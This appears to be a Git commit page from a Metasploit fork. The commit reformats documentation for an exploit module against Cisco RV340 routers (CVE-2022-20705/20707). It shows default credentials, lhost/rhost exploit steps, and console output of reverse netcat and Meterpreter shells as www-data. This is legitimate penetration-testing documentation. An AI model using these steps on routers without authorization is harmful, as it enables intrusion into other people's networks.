adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Minor fixes from review

Browse Source
This commit is contained in:
Grant Willcox
2023-02-09 15:34:25 -06:00
parent 4b05ba6189
commit f2a86327d0
2 changed files with 21 additions and 21 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/cisco_rv340_lan.md
+16 -16
View File
@@ -9,14 +9,19 @@ Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03
### Installation
Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
Firmware version 1.0.03.24, which is vulnerable to CVE-2022-20705 and CVE-2022-20707, can be downloaded from
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
Log into the modem. Default IP address is 192.168.1.1 and default credentials
are cisco for username and password. The `administration` option on the left
side of the web page will take you to a form with a `Manual Upgrade` section.
Leave `File Type: ` on default `Firmware Image` option. Change `Upgrade From:` option to `PC`. Press the `Upgrade` button.
Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`. Wait for router
reboot to complete.
To install this firmware, follow the following directions:
1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
are `cisco` for the username and password.
2. The `administration` option on the left side of the web page will take you to a form
with a `Manual Upgrade` section.
3. Leave `File Type: ` on the default `Firmware Image` option.
4. Change `Upgrade From:` option to `PC`.
5. Press the `Upgrade` button.
6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.
7. Wait for router reboot to complete.
## Verification Steps
@@ -26,16 +31,14 @@ reboot to complete.
4. Do: `set lhost <listening ip>`
5. Do: `set rhost <target ip>`
6. Do: `exploit`
7. Verify: You see the message "Exploit successfully executed" confirming the exploit completed
8. Verify: You are the "www-data" user using the `id` command
7. Verify: You see the message `Exploit successfully executed` confirming the exploit completed
8. Verify: You are the `www-data` user using the `id` command
## Options
## Scenarios
### Reverse Netcat Output
Cisco RV340 Router running 1.0.03.24 on ARM architecture
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_netcat payload
```
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
@@ -55,11 +58,9 @@ msf6 exploit(linux/http/cisco_rv340_lan) > exploit
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Meterpreter Linux Dropper
Cisco RV340 Router running 1.0.03.24 on ARM architecture
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_tcp ARMLE Meterpreter payload
```
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
@@ -90,5 +91,4 @@ Process 11012 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```